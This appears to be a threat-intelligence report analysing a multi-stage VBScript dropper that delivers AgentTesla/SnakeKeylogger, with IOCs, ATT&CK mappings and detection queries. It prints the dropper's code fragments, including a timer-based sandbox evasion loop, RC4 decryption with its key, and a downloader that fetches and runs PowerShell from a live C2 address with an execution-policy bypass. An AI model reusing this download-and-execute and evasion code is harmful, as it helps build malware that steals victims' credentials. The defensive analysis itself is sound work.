Severity: High | Category: Phishing

AgentTesla/SnakeKeylogger — Multi-Layer VBScript Dropper (PO_20981.vbe)

Published: March 12, 2026
Tags: phishing, agenttesla, social-engineering, c2, apt, spearphishing

Executive Summary

This sample is a heavily obfuscated VBScript dropper (PO_20981.vbe) distributed with a Purchase Order social-engineering lure. The file uses a three-layer obfuscation chain to evade static detection: (1) an outer VBScript layer that concatenates 1,322 fragmented base64 chunks, applies 539 Replace() passes to strip embedded noise tokens, and RC4-decrypts the resulting binary with the key FHFCDCadRR&&^%$#; (2) an in-memory VBScript second stage that builds an obfuscated download URL character by character, downloads a PowerShell script from http://192.210.186.208/web/ENCRYPT.Ps1, and runs it with an execution-policy bypass; and (3) the third-stage PowerShell payload, assessed to be AgentTesla or SnakeKeylogger based on the TrendMicro detection TrojanSpy.VBS.SNAKEKEYLOGGER.SM and the abuse.ch AgentTesla tag. The C2 server (192.210.186.208) is hosted on ColoCrossing (ASN 36352, US) and is flagged as malicious by 11 VirusTotal vendors, including Kaspersky, Fortinet, and SOCRadar. It exposes ports 80, 443, 445, and 5985 and carries multiple critical CVEs. Anti-sandbox evasion consists of a 2.2-second timer loop before payload decryption.


Sample Metadata

| Field | Value |
| --- | --- |
| SHA-256 | 337e2b2a81e09ae37d00a94596d965c1a2782d5e5ad27704b8597d1d11a7a00f |
| MD5 | c1aa056379f7b130413716aff900e70d |
| SHA-1 | 28ce60ea3d4acff44c4b397c27acf2af05809094 |
| Filename | PO_20981.vbe, c1aa056379f7b130413716aff900e70d.vbe |
| File Type | VBScript (text/plain, .vbe extension) |
| File Size | 51,702 bytes (600 lines) |
| First Seen | 2026-03-12 15:47:14 UTC |
| Reporter | abuse.ch |
| VT Detections | 26 / 62 |
| Threat Family Tags | AgentTesla, VBS dropper, SnakeKeylogger |
| Notable AV Labels | TrojanSpy.VBS.SNAKEKEYLOGGER.SM (TrendMicro), VBS/Agent.TVK (ESET), ISB.Dropper!gen1 (Symantec), Trojan.GenericKD.79688875 (BitDefender/VIPRE) |

Static Analysis

File Structure

The .vbe extension normally indicates VBScript Encoded (produced with the Microsoft Script Encoder), but this file is plaintext VBScript — the .vbe extension serves as a social-engineering artifact and keeps the file associated with wscript.exe on Windows, which runs it whether or not it is actually encoded. The file contains 600 lines and is structured in two logical sections:

  1. Stage 1 Loader (lines 1–571): Obfuscated payload delivery via RC4-encrypted, base64-encoded, noise-polluted data
  2. Execution (lines 574–600): XML COM object base64 decode + RC4 decrypt + Execute()

Anti-Sandbox Evasion

Dim startTick, elapsedTick
startTick = Timer
Do
    elapsedTick = Timer - startTick
    If elapsedTick < 0 Then elapsedTick = elapsedTick + 86400
Loop Until elapsedTick >= 2.2

The script opens with a 2.2-second timer loop before any payload activity, intended to outlast sandboxes with short execution timeouts. Because it busy-waits on Timer rather than calling WScript.Sleep, sandboxes that hook or accelerate sleep calls do not shorten the delay. The midnight-crossing correction (+ 86400, needed because Timer returns seconds since midnight) shows careful implementation.

Obfuscation Layer 1: Junk Code

Lines 1–7 include dead code with no runtime effect:

Dim tempVal : tempVal = 100 : For cnt = 1 To 3 : tempVal = tempVal * cnt : Next
If 1 = 0 Then WScript.Echo "Hidden message" : End If

Obfuscation Layer 2: Fragmented Base64 with Noise Tokens

Line 19 contains 1,322 base64 chunks concatenated into fullBase64. Each chunk is 10 characters. Embedded throughout are hex-encoded noise tokens (e.g., 7B307D, 21215448454E2121, 4040494E414040) that act as sentinels. Lines 33–571 (539 Replace() calls) strip all noise tokens, leaving clean base64. Example noise tokens and the text their hex values decode to:

| Token Pattern (Hex) | Decoded Text |
| --- | --- |
| 7B307D | {0} |
| 21215448454E2121 | !!THEN!! |
| 21214F5A4B542121 | !!OZKT!! |
| 4040494E414040 | @@INA@@ |
| 2323424D49474A2323 | ##BMIGJ## |

Obfuscation Layer 3: RC4 Decryption

Set xmlDoc = CreateObject("Microsoft.XMLDOM").createElement("base64")
xmlDoc.dataType = "bin.base64"
xmlDoc.text = fullBase64
encryptedData = xmlDoc.nodeTypedValue

decryptedData = RC4Decrypt(encryptedData, "FHFCDCadRR&&^%$#")
Execute decryptedData

  • Decode method: Microsoft XML DOM bin.base64 dataType (avoids System.Convert to evade detection)
  • Cipher: RC4 (custom implementation in lines 580–597)
  • Key: FHFCDCadRR&&^%$#
  • Output size: 2,655 bytes of VBScript executed in-memory via Execute()
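To make layers 2 and 3 concrete, the following Python script, added here as an example and not code from the sample or the report, reimplements the stage-1 unpacking an analyst would script: strip the noise tokens, base64-decode, RC4-decrypt with the key above. The RC4 key and the three noise tokens are the report's; the encrypted blob is constructed from a benign placeholder string, because the real 2,655-byte stage 2 is not reproduced here.

```python
import base64
import re

# From the report: the stage-1 RC4 key and three of the hex-encoded noise
# tokens that the loader's 539 Replace() passes remove from the base64.
RC4_KEY = b"FHFCDCadRR&&^%$#"
NOISE_TOKENS = ["7B307D", "21215448454E2121", "4040494E414040"]


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). The same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_stage1(polluted_b64: str, key: bytes = RC4_KEY) -> bytes:
    """Mirror the loader: strip noise tokens, base64-decode, RC4-decrypt."""
    clean = polluted_b64
    for token in NOISE_TOKENS:  # the VBScript does this with Replace()
        clean = clean.replace(token, "")
    # Anything left outside the base64 alphabet means an unlisted token.
    if not re.fullmatch(r"[A-Za-z0-9+/]*={0,2}", clean):
        raise ValueError("non-base64 characters remain: unknown noise token")
    return rc4(key, base64.b64decode(clean))


def build_sample(plaintext: bytes, key: bytes = RC4_KEY) -> str:
    """Constructed input (not the real blob): encrypt, base64, split into
    10-character chunks and interleave noise tokens as the report describes."""
    b64 = base64.b64encode(rc4(key, plaintext)).decode()
    chunks = [b64[i:i + 10] for i in range(0, len(b64), 10)]
    return "".join(c + NOISE_TOKENS[n % len(NOISE_TOKENS)]
                   for n, c in enumerate(chunks))


if __name__ == "__main__":
    sample = build_sample(b'WScript.Echo "stage 2 placeholder"')
    print(decode_stage1(sample).decode())
```

Against the real file, the input to decode_stage1 would be the fullBase64 string after the 1,322 chunks are joined, and the token list would need all 539 values the Replace() calls name.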

Decrypted Stage 2 VBScript

The decrypted second stage is a downloader VBScript with the following notable characteristics:

URL obfuscation (character-by-character concatenation):

url = "h" & "t" & "t" & "p" & ":" & "/" & "/" & "1" & "9" & "2" & "." & "2" & "1" & "0" & "." & "1" & "8" & "6" & "." & "2" & "0" & "8" & "/" & "w" & "e" & "b" & "/" & "E" & "N" & "C" & "R" & "Y" & "P" & "T" & "." & "P" & "s" & "1"

Resolves to: http://192.210.186.208/web/ENCRYPT.Ps1

Execution chain:

Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", url, False
xhr.Send
' Writes response to C:\Temp\<RANDOM8>.ps1
shell.Run "powershell.exe -nop -ep bypass -file """ & psFile & """", 0, True

Key behaviors:

  • Creates C:\Temp\ if it does not exist
  • Generates an 8-character random uppercase filename (e.g., KFXJRMQB.ps1) to defeat static path-based detection
  • Downloads stage 3 via synchronous HTTP GET using MSXML2.XMLHTTP
  • Executes with shell.Run ..., 0, True — hidden window (0), waits for completion (True)
  • Uses -nop (no profile), -ep bypass (execution policy bypass)
  • Cleanup() is a stub — file is not deleted after execution (stage 3 remains on disk)

Behavioral Analysis

Full Execution Chain

User opens PO_20981.vbe
  → WScript.exe executes VBScript
    → Anti-sandbox: 2.2-second sleep
    → 1,322 base64 chunks concatenated
    → 539 Replace() noise removals
    → XML DOM base64 decode → binary blob
    → RC4 decrypt (key: FHFCDCadRR&&^%$#)
    → Execute() runs Stage 2 VBScript in-memory
      → Creates C:\Temp\ (if needed)
      → Generates random .ps1 filename
      → HTTP GET http://192.210.186.208/web/ENCRYPT.Ps1
      → Writes PowerShell to C:\Temp\<RANDOM8>.ps1
      → powershell.exe -nop -ep bypass -file <path>  [hidden window]
        → Stage 3: AgentTesla/SnakeKeylogger PowerShell
          → Credential harvesting, keylogging, SMTP exfiltration

Assessed Stage 3 Capabilities (AgentTesla/SnakeKeylogger)

Based on the filename ENCRYPT.Ps1, threat family tags, and TrendMicro detection TrojanSpy.VBS.SNAKEKEYLOGGER.SM:

| Capability | Description |
| --- | --- |
| Keylogging | Captures keystrokes via Windows API hooks |
| Credential harvesting | Extracts credentials from browsers, email clients, FTP clients |
| Screenshot capture | Periodic desktop screenshots |
| Clipboard monitoring | Captures clipboard contents |
| SMTP exfiltration | Sends stolen data via SMTP to attacker-controlled mailbox |
| Persistence | Registry run keys or scheduled task creation |
| Anti-analysis | Obfuscated .NET assembly, in-memory execution |

Network Indicators

C2 Server: 192.210.186.208

| Field | Value |
| --- | --- |
| IP Address | 192.210.186.208 |
| Hostname | 192-210-186-208-host.colocrossing.com |
| ASN | AS36352 (ColoCrossing / HostPapa) |
| Country | United States |
| VT Reputation | 11/94 malicious (Kaspersky, Fortinet, CyRadar, SOCRadar, CRDF, Criminal IP, Cluster25, alphaMountain.ai, ADMINUSLabs, Forcepoint, Webroot) |
| SOCRadar Tag | phishing |
| Open Ports | 80 (HTTP), 443 (HTTPS), 445 (SMB), 5985 (WinRM) |
| Software | Apache 2.4.58, PHP 8.2.12, OpenSSL 3.1.3, jQuery 1.10.2 |
| TLS Certificate | Self-signed |

Notable CVEs on C2 Server

| CVE | Description | Severity |
| --- | --- | --- |
| CVE-2024-4577 | PHP CGI argument injection (RCE) | Critical |
| CVE-2020-0796 | SMBGhost — Windows SMB RCE | Critical |
| CVE-2024-36387 | Apache HTTP Server null pointer dereference | High |
| CVE-2024-38472–38477 | Apache HTTP Server SSRF / bypass / redirect | High |
| CVE-2023-38709 | Apache HTTP Server response splitting | Medium |

Stage 3 Delivery URL

| URL | Protocol | Purpose |
| --- | --- | --- |
| http://192.210.186.208/web/ENCRYPT.Ps1 | HTTP/80 | Stage 3 PowerShell payload delivery |

MITRE ATT&CK TTPs

| Tactic | Technique | ID | Notes |
| --- | --- | --- | --- |
| Initial Access | Spearphishing Attachment | T1566.001 | PO_20981.vbe — Purchase Order lure |
| Execution | User Execution: Malicious File | T1204.002 | User must open/run the .vbe file |
| Execution | Command and Scripting Interpreter: Visual Basic | T1059.005 | VBScript dropper (both stages) |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | Stage 3 executed via powershell.exe -ep bypass |
| Defense Evasion | Obfuscated Files or Information | T1027 | Base64 + RC4 + 539 noise token removals |
| Defense Evasion | Obfuscated Files or Information: Command Obfuscation | T1027.010 | Character-by-character URL concatenation |
| Defense Evasion | Virtualization/Sandbox Evasion: Time Based Evasion | T1497.003 | 2.2-second timer sleep |
| Defense Evasion | Execution Guardrails | T1480 | Timer ensures sandbox timeout before payload |
| Defense Evasion | Modify Registry | T1112 | Assessed: stage 3 persistence via registry |
| Command and Control | Ingress Tool Transfer | T1105 | Downloads ENCRYPT.Ps1 from C2 |
| Command and Control | Application Layer Protocol: Web Protocols | T1071.001 | HTTP GET to C2 on port 80 |
| Collection | Input Capture: Keylogging | T1056.001 | AgentTesla/SnakeKeylogger capability |
| Collection | Screen Capture | T1113 | AgentTesla/SnakeKeylogger capability |
| Collection | Clipboard Data | T1115 | AgentTesla/SnakeKeylogger capability |
| Credential Access | Credentials from Password Stores | T1555 | Browser/email credential harvesting |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | SMTP/HTTP exfiltration |
| Persistence | Boot or Logon Autostart Execution: Registry Run Keys | T1547.001 | Assessed: stage 3 persistence |

IOCs

File Indicators

| Type | Value | Notes |
| --- | --- | --- |
| SHA-256 | 337e2b2a81e09ae37d00a94596d965c1a2782d5e5ad27704b8597d1d11a7a00f | Stage 1 VBScript dropper |
| MD5 | c1aa056379f7b130413716aff900e70d | Stage 1 VBScript dropper |
| SHA-1 | 28ce60ea3d4acff44c4b397c27acf2af05809094 | Stage 1 VBScript dropper |
| Filename | PO_20981.vbe | Phishing delivery filename |
| Path | C:\Temp\*.ps1 | Stage 3 PS1 drop location |
| Path | C:\Temp\ | Created staging directory |
| File pattern | C:\Temp\[A-Z]{8}.ps1 | Random-named stage 3 |

Network Indicators

| Type | Value | Notes |
| --- | --- | --- |
| IP Address | 192.210.186.208 | C2 server (ColoCrossing US) |
| URL | http://192.210.186.208/web/ENCRYPT.Ps1 | Stage 3 PowerShell payload URL |
| Hostname | 192-210-186-208-host.colocrossing.com | C2 reverse DNS |
| ASN | AS36352 | ColoCrossing / HostPapa |
| Port | 80/tcp | C2 HTTP delivery |
| Port | 5985/tcp | WinRM (potential lateral movement vector on C2) |

Behavioral / String Indicators

| Type | Value | Notes |
| --- | --- | --- |
| RC4 Key | FHFCDCadRR&&^%$# | Decrypts stage 2 from stage 1 |
| VBS noise token | 7B307D | Hex-encoded noise injected in base64 |
| User-Agent | MSXML2.XMLHTTP default | HTTP download via COM object |
| Process | powershell.exe -nop -ep bypass -file | Stage 3 launcher command pattern |
| COM object | Microsoft.XMLDOM | Used for base64 decode |
| COM object | MSXML2.XMLHTTP | Used for C2 HTTP GET |
| COM object | WScript.Shell | Used for process execution |
| COM object | Scripting.FileSystemObject | Used for file operations |

Campaign Context and Attribution

Delivery Mechanism

The filename PO_20981.vbe (Purchase Order + number) is a classic Business Email Compromise (BEC) or spear-phishing lure. AgentTesla and SnakeKeylogger are frequently distributed via .vbe droppers in campaigns targeting manufacturing, logistics, and finance sectors, typically delivered via email attachments impersonating purchase orders, invoices, or shipping notifications.

Threat Actor Assessment

| Assessment | Confidence | Notes |
| --- | --- | --- |
| AgentTesla campaign | High | Tagged by abuse.ch, TrendMicro SNAKEKEYLOGGER SM detection, ENCRYPT.Ps1 naming |
| Commercial crimeware | High | Both AgentTesla and SnakeKeylogger are sold/rented as commodity RAT/stealer tools |
| Attribution to specific TA | Low | Insufficient data; consistent with numerous financially-motivated threat actors |
| Infrastructure sharing | Medium | ColoCrossing IP space commonly abused by multiple criminal TA groups |

Historical Context

  • AgentTesla is a .NET-based RAT/keylogger sold as Malware-as-a-Service (MaaS) since 2014, with continued active development. It harvests credentials from 70+ applications.
  • SnakeKeylogger (aka 404 Keylogger) is a .NET stealer active since late 2020, with functionality overlapping AgentTesla.
  • Multi-layer VBScript dropper chains with RC4-encrypted payloads and timer-based evasion are a consistent TTP in AgentTesla delivery campaigns observed in 2024–2026.

Detection Recommendations

Endpoint Detection

  1. Block .vbe email attachments at the email gateway — VBScript Encoded files have negligible legitimate use.
  2. Alert on wscript.exe spawning powershell.exe with -ep bypass — this child process relationship is a high-fidelity indicator.
  3. Alert on powershell.exe with -nop -ep bypass -file C:\Temp\ — execution from C:\Temp\ with bypass flags is highly suspicious.
  4. Monitor MSXML2.XMLHTTP COM object creation by script interpreters — script-based HTTP downloads are rarely legitimate.
  5. Block execution from C:\Temp\ via AppLocker/WDAC policies.
  6. Alert on wscript.exe processes exceeding 3 seconds wall time before network activity — may indicate timer-based anti-sandbox.

Network Detection

  1. Block outbound HTTP to 192.210.186.208 on all egress paths.
  2. Alert on HTTP GET requests matching */web/ENCRYPT.Ps1 (case-insensitive).
  3. Alert on HTTP GET requests for *.Ps1 files from non-browser user agents.
  4. Block ASN 36352 (ColoCrossing) for high-risk environments.

YARA and Signature Rules

See accompanying yara_rules.yar and suricata.rules files.

Hunting Queries (Pseudo-SPL/KQL)

# Splunk: WScript spawning PowerShell with bypass
index=endpoint sourcetype=sysmon EventCode=1
  ParentImage="*wscript.exe"
  CommandLine="*-ep bypass*"

# Splunk: PowerShell executing from C:\Temp\ with bypass
index=endpoint sourcetype=sysmon EventCode=1
  Image="*powershell.exe"
  CommandLine="*-nop*bypass*C:\\Temp\\*"

# KQL (Defender): wscript parent + powershell child
DeviceProcessEvents
| where InitiatingProcessFileName =~ "wscript.exe"
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has "-ep bypass"
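The same three hunting rules as a runnable Python check over Sysmon Event ID 1 records, added here as an example and not part of the report. The event records are constructed for illustration (the hypothetical KFXJRMQB.ps1 name follows the report's file pattern), and the bypass match is generalised slightly beyond the SPL/KQL above to also accept PowerShell's -ExecutionPolicy and abbreviated -exec forms.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 records (not telemetry from the sample),
# reduced to the fields the three hunting queries use.
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -nop -ep bypass -file "C:\Temp\KFXJRMQB.ps1"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir"},
]

# "-ep bypass" as in the report, plus -ExecutionPolicy / -exec forms PowerShell accepts.
EP_BYPASS = re.compile(r"-e(?:p|x[a-z]*)\s+bypass", re.IGNORECASE)
# Report's file pattern C:\Temp\[A-Z]{8}.ps1; only the path part is case-folded.
RANDOM_PS1 = re.compile(r"(?i:c:\\temp\\)[A-Z]{8}\.(?i:ps1)")


def matched_rules(event: Dict[str, str]) -> List[str]:
    """Names of the report's hunting rules that this one event triggers."""
    parent = event["ParentImage"].lower()
    image = event["Image"].lower()
    cmd = event["CommandLine"]
    flat = cmd.lower()
    hits = []
    # Rule 1: wscript.exe parent, powershell.exe child, execution policy bypass.
    if parent.endswith("\\wscript.exe") and image.endswith("\\powershell.exe") \
            and EP_BYPASS.search(cmd):
        hits.append("wscript_spawns_powershell_bypass")
    # Rule 2: powershell.exe with -nop, a bypass, and a script under C:\Temp\.
    if image.endswith("\\powershell.exe") and "-nop" in flat \
            and "bypass" in flat and "c:\\temp\\" in flat:
        hits.append("powershell_bypass_from_temp")
    # Rule 3: random eight-uppercase-letter .ps1 under C:\Temp anywhere on the line.
    if RANDOM_PS1.search(cmd):
        hits.append("random_ps1_in_temp")
    return hits


if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["CommandLine"], "->", matched_rules(ev) or "clean")
```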